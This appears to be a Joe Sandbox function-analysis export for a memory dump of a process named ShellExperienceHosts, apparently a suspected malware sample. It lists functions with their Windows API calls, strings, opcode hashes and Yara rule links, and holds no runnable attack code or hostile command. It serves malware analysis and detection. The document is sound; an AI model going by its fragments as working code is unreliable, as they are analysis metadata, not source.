API ID: State$ClientParentScreenWindow
String ID: 0
API String ID: 1527269598-4108050209
Opcode ID: d347db300c29a5d9191ba9ca2a8631df63cf4362d61733a18a2fc1d759849936
Instruction ID: 1b3f43973f31031af8553085346b42beca3686cb5980fc8d70670b2d91f8a3de
Opcode Fuzzy Hash: d347db300c29a5d9191ba9ca2a8631df63cf4362d61733a18a2fc1d759849936
Instruction Fuzzy Hash: 5261A170B007599FDF15AF64D884BAD7BB9EF49704F25412AE816B7680DB70EC018B51

Function 6C9D4365 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6C9CD9FD,6C9CCF1A,00000003,?,00000004,6C9CCF1A), ref: 6C9D4377
GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 6C9D4387
EncodePointer.KERNEL32(00000000,?,6C9CD9FD,6C9CCF1A,00000003,?,00000004,6C9CCF1A), ref: 6C9D4390
DecodePointer.KERNEL32(00000000,?,?,6C9CD9FD,6C9CCF1A,00000003,?,00000004,6C9CCF1A), ref: 6C9D439E
GetLocaleInfoW.KERNEL32(00000000,00000004,?,00000003,?,6C9CD9FD,6C9CCF1A,00000003,?,00000004,6C9CCF1A), ref: 6C9D43D5

Strings

GetLocaleInfoEx, xrefs: 6C9D4381
kernel32.dll, xrefs: 6C9D4372

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleInfoLocaleModuleProc
String ID: GetLocaleInfoEx$kernel32.dll
API String ID: 1461536855-1547310189
Opcode ID: 65fe5d1db69ccf6ab9ef3991739527a90fd6dede5dd3b19e23dae3ade732c4da
Instruction ID: 40baa598bc7030b19a9990acbf35ac96c83c3ef78a88ac1b7db9f9c6160a7c62
Opcode Fuzzy Hash: 65fe5d1db69ccf6ab9ef3991739527a90fd6dede5dd3b19e23dae3ade732c4da
Instruction Fuzzy Hash: DA014B3560165AABCF111FA4ED08C9E3B7DFF0A3547058925FD09A3910DB31D9209FA0

Function 6C9E410B Relevance: 10.6, APIs: 7, Instructions: 138fileCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6C9E4115
PathIsUNCW.SHLWAPI(?,?,?,?,6CA2F7A2,00000024,?,?,?), ref: 6C9E41C5
GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,6CA2F7A2,00000024,?,?,?), ref: 6C9E41E9
GetFullPathNameW.KERNEL32(?,00000104,?,?,00000268,6C9E390F,?,?,00000000,?,6CA2F7A2,00000024,?,?,?), ref: 6C9E4148

Part of subcall function 6C9E40C9: GetLastError.KERNEL32(?,?,?,6C9E41FA,?,?,?,6CA2F7A2,00000024,?,?,?), ref: 6C9E40D5

Part of subcall function 6C9E3986: PathStripToRootW.SHLWAPI(00000000,?,?,6CA2F7A2,00000024,?,?,?), ref: 6C9E39BA

CharUpperW.USER32(?,?,6CA2F7A2,00000024,?,?,?), ref: 6C9E4217
FindFirstFileW.KERNEL32(?,?,?,6CA2F7A2,00000024,?,?,?), ref: 6C9E422F
FindClose.KERNEL32(00000000,?,6CA2F7A2,00000024,?,?,?), ref: 6C9E423B

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Path$Find$CharCloseErrorFileFirstFullH_prolog3_InformationLastNameRootStripUpperVolume
String ID:
API String ID: 2323451338-0
Opcode ID: 63adfd658858a12f69269f6e79680a05319dc52e5ff728f5aaaea8945a910e8a
Instruction ID: 074fb789fb60d8ac438497e232e0856688ee8593fa9a5c1b7a2a7999af92a221
Opcode Fuzzy Hash: 63adfd658858a12f69269f6e79680a05319dc52e5ff728f5aaaea8945a910e8a
Instruction Fuzzy Hash: 57418471614155AFEF129BA4CC88EEE777CFF35308F140698A419A3A40EB31EE499E60

Function 6C9CB855 Relevance: 9.2, APIs: 6, Instructions: 218COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 6C9CB89D
EqualRect.USER32(?,?), ref: 6C9CB8BB

Part of subcall function 6C9BE7EE: SetWindowPos.USER32(?,?,?,3E6EA3C2,6C9BEBAD,?,6C9BF24C,00000000,?,6C9C23ED,00000000,00000000,00000000,00000000,00000000,00000097), ref: 6C9BE816

GetDlgCtrlID.USER32(?), ref: 6C9CB967
CopyRect.USER32(?,?), ref: 6C9CB9A3
GetParent.USER32(?), ref: 6C9CBA84
SetParent.USER32(?,?), ref: 6C9CBA9A

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Rect$ParentWindow$CopyCtrlEqual
String ID:
API String ID: 1662903855-0
Opcode ID: d48e5d65bce645131494b01bb8313c6c702078a3781b029e8698b52921f87a82
Instruction ID: 4d57fc3476276467afbb68c8e4158ab3df438c21bc7ddbd0ed5ea2b2352d1968
Opcode Fuzzy Hash: d48e5d65bce645131494b01bb8313c6c702078a3781b029e8698b52921f87a82
Instruction Fuzzy Hash: 0981AF71701619ABDF14DF74CD88BEEB7B9FF65308F1042A9E819A7690CB30E9448B52

Function 6CB1C89B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,6CB1CBAD,00000002,00000000,?,?,?,6CB1CBAD,?,00000000), ref: 6CB1C934
GetLocaleInfoW.KERNEL32(?,20001004,6CB1CBAD,00000002,00000000,?,?,?,6CB1CBAD,?,00000000), ref: 6CB1C95D
GetACP.KERNEL32(?,?,6CB1CBAD,?,00000000), ref: 6CB1C972

Strings

ACP, xrefs: 6CB1C8B9
OCP, xrefs: 6CB1C8EF

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: c4c424f7b99b634fa5097027ccd00d22012b2599a4e2e76161d14fcfe4684e4a
Instruction ID: 1f71ff2854cdf14b176407eccaf786befe2dc8ea0fa968812a7078260e92f035
Opcode Fuzzy Hash: c4c424f7b99b634fa5097027ccd00d22012b2599a4e2e76161d14fcfe4684e4a
Instruction Fuzzy Hash: 6A21282274D180AAD721AF29C901A9B73B6EF45FE8B664234E90BDBD00E732DE40C355

Function 6CB1CA77 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6CB0E9F9: GetLastError.KERNEL32(00000000,?,6CB1849B), ref: 6CB0E9FD
Part of subcall function 6CB0E9F9: SetLastError.KERNEL32(00000000,?,?,00000028,6CB0E454), ref: 6CB0EA9F

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6CB1CB7F
IsValidCodePage.KERNEL32(00000000), ref: 6CB1CBBD
IsValidLocale.KERNEL32(?,00000001), ref: 6CB1CBD0
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6CB1CC18
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6CB1CC33

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 1a7d77c7ee16d062ebbbedcc5ba5c9ca920f160ac5f8b7601c0cf78a767dde06
Instruction ID: d03698fa7b1601a58fde460c45b699748387eb939bc64f2a4d9dc6590ea59574
Opcode Fuzzy Hash: 1a7d77c7ee16d062ebbbedcc5ba5c9ca920f160ac5f8b7601c0cf78a767dde06
Instruction Fuzzy Hash: 08516171B05299ABEF10EFA5DC84AAF77B8FF09704F100579E514E7E80D7709A048BA6

Function 6C9C8927 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 6C9C8C2E

Part of subcall function 6C9BE7EE: SetWindowPos.USER32(?,?,?,3E6EA3C2,6C9BEBAD,?,6C9BF24C,00000000,?,6C9C23ED,00000000,00000000,00000000,00000000,00000000,00000097), ref: 6C9BE816

SetRectEmpty.USER32(?), ref: 6C9C8CBC

Strings

@, xrefs: 6C9C8A86

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: RectWindow$Empty
String ID: @
API String ID: 650961088-2766056989
Opcode ID: 9e0036ec8bf25354bc631770a2f09d9ba7b2e99979b24e1c96a0a63b389f87fb
Instruction ID: 7dd707e47bffda6d429855b5f5170d92a527f1064c68ce750d05380e311b0c3c
Opcode Fuzzy Hash: 9e0036ec8bf25354bc631770a2f09d9ba7b2e99979b24e1c96a0a63b389f87fb
Instruction Fuzzy Hash: 78E14771E01219AFDB08CFA8D984AEEBBF9FF59314F15411AE815B7380DB30A941CB56

Function 6CB1C102 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 254COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6CB0E9F9: GetLastError.KERNEL32(00000000,?,6CB1849B), ref: 6CB0E9FD
Part of subcall function 6CB0E9F9: SetLastError.KERNEL32(00000000,?,?,00000028,6CB0E454), ref: 6CB0EA9F

GetACP.KERNEL32(?,?,?,?,?,?,6CB10766,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 6CB1C1C1
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6CB10766,?,?,?,00000055,?,-00000050,?,?), ref: 6CB1C1F8
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6CB1C35B

Strings

utf8, xrefs: 6CB1C2CA

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: d8ec6114021e540ea3558fc96c0845f931e29b713279d23b75e6746a9c9a6924
Instruction ID: 643cb0356843240bc15c474795929a132636ff9530b074869db5489dda3fd95d
Opcode Fuzzy Hash: d8ec6114021e540ea3558fc96c0845f931e29b713279d23b75e6746a9c9a6924
Instruction Fuzzy Hash: 387128716887C6ABE714BBB5CC45BAF73A8EF05718F10013AE515DBE80EB70E5448791

Function 6CAF5B5D Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00000001), ref: 6CAF5B69
IsDebuggerPresent.KERNEL32 ref: 6CAF5C35
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CAF5C4E
UnhandledExceptionFilter.KERNEL32(?), ref: 6CAF5C58

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 729bc1ce9f043795938b55d18f9fbf1a8bf54bb30b3024c9db80415dafaed1ac
Instruction ID: ca690fc14483f65a105dce4be550bb7f68350615ab4797bc7cc1270b91cf83f8
Opcode Fuzzy Hash: 729bc1ce9f043795938b55d18f9fbf1a8bf54bb30b3024c9db80415dafaed1ac
Instruction Fuzzy Hash: 2131D575D053189BDF21DFA4D9897CDBBB8AF08304F1081AAE40DAB250EB719B85CF45

Function 6C9BA733 Relevance: 6.0, APIs: 4, Instructions: 38keyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9BE4F7: GetWindowLongW.USER32(00000004,000000F0), ref: 6C9BE504

GetKeyState.USER32(00000010), ref: 6C9BA750
GetKeyState.USER32(00000011), ref: 6C9BA75D
GetKeyState.USER32(00000012), ref: 6C9BA76A
SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 6C9BA784

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: 7dd063da2ec9d1794d94e4abf11eb433b303bfdf5dda64202bc442042f2f79e6
Instruction ID: ef16cc007a25277b6ba5599f142afd462050d3248877323e6805da2706efa88a
Opcode Fuzzy Hash: 7dd063da2ec9d1794d94e4abf11eb433b303bfdf5dda64202bc442042f2f79e6
Instruction Fuzzy Hash: 46F0B435B4828977EB642B765CCCBFB3B749F61F68F040624A505BA5C0DEB0C40555E0

Function 6CB1C51F Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 6CB0E9F9: GetLastError.KERNEL32(00000000,?,6CB1849B), ref: 6CB0E9FD
Part of subcall function 6CB0E9F9: SetLastError.KERNEL32(00000000,?,?,00000028,6CB0E454), ref: 6CB0EA9F

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6CB1C573
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6CB1C5BD
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6CB1C683

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 9f821ab0cbcdf2bbea9d90059344b06e94aaf129a61ca771f71abc02443211bd
Instruction ID: d69141089661234b31eae1c73b92721638a0c4fd2bb1241e025840ba5d4a1eef
Opcode Fuzzy Hash: 9f821ab0cbcdf2bbea9d90059344b06e94aaf129a61ca771f71abc02443211bd
Instruction Fuzzy Hash: BC61C4716082479FEB15AF29CD81BAA77B8FF05348F204179E915C7E80E774E984CB91

Function 6CAFFD7C Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CAFFE74
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CAFFE7E
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CAFFE8B

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 6d7f701782e274b9d949653d27b3a2e255bd52ff9da101a48889366020ce13fb
Instruction ID: 817982d08ed7102b752f6b72fd5905957168f875f7c09e9eaefc56d116124495
Opcode Fuzzy Hash: 6d7f701782e274b9d949653d27b3a2e255bd52ff9da101a48889366020ce13fb
Instruction Fuzzy Hash: 593182759012289BCB61DF68DD887CDBBB8BF08314F5041EAE41CA7650EB709B86CF44

Function 6C9C4A38 Relevance: 4.5, APIs: 3, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000111,?,?), ref: 6C9C4A6B
IsIconic.USER32(?), ref: 6C9C4A87
IsWindowVisible.USER32(?), ref: 6C9C4A94

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: IconicMessageSendVisibleWindow
String ID:
API String ID: 2733464030-0
Opcode ID: 7d5cb635285c1957e4d207cefe5acc2d4de4cee9ed508d1b1c863f032af91abb
Instruction ID: 000078bfd841cdec9b7ae120e8a66097ab36f3fff7ae848c4c0e277fcba02fe6
Opcode Fuzzy Hash: 7d5cb635285c1957e4d207cefe5acc2d4de4cee9ed508d1b1c863f032af91abb
Instruction Fuzzy Hash: 93018B32310155BF9F056B75EC049AD7BBDFF59659B000021F919E7A60EB31D8209AD2

Function 6C9BAE1E Relevance: 3.4, APIs: 2, Instructions: 404COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6C9BAE28

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 35344b054414635f024b67a8ad4d4f7522e46eac3bf5e3db7928508e05a47524
Instruction ID: ebf9748ded9130df8a9a2d8c98e695ce8277fae4422ce07927cb2e82e01f8d5d
Opcode Fuzzy Hash: 35344b054414635f024b67a8ad4d4f7522e46eac3bf5e3db7928508e05a47524
Instruction Fuzzy Hash: 86E17B70A0025AEFDB04CF64C894BBE77B9AF55318F148019E819BBB90DB34ED51CB51

Function 6C9BEF5C Relevance: 3.0, APIs: 2, Instructions: 36windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 6C9BEF6E
IsIconic.USER32(?), ref: 6C9BEF80

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: IconicVisibleWindow
String ID:
API String ID: 1797901696-0
Opcode ID: 6457d5cbd9c8bb58daae11aaf42cb5b3d1f53e0e2b47cb73d7f1dc78e832f387
Instruction ID: 1750279084dd67c83a9de1e85c757c986c20246a0b5609e6a422443c83e083cb
Opcode Fuzzy Hash: 6457d5cbd9c8bb58daae11aaf42cb5b3d1f53e0e2b47cb73d7f1dc78e832f387
Instruction Fuzzy Hash: 43F08236715028BB8B041679DC009AFB6AF9F9A6397040366E968B39E0EBB1D83156D1

Function 6C9ABFE0 Relevance: 2.2, Strings: 1, Instructions: 910COMMON

Download Yara Rule

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 6C9AC066

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 593203224-2799312399
Opcode ID: 998f6e14abe14a3353a7c7da4d331abba2a60717720e21c5bf8ad55f794107e4
Instruction ID: 66bd5f5eaa566bf7130468c1c6dd03a18653fea16de475a4298ce82331e19ffa
Opcode Fuzzy Hash: 998f6e14abe14a3353a7c7da4d331abba2a60717720e21c5bf8ad55f794107e4
Instruction Fuzzy Hash: 3882D230605285CFDB05DFA8C450BAABBF5AF46308F24859CD8A59FB92D336E947CB50

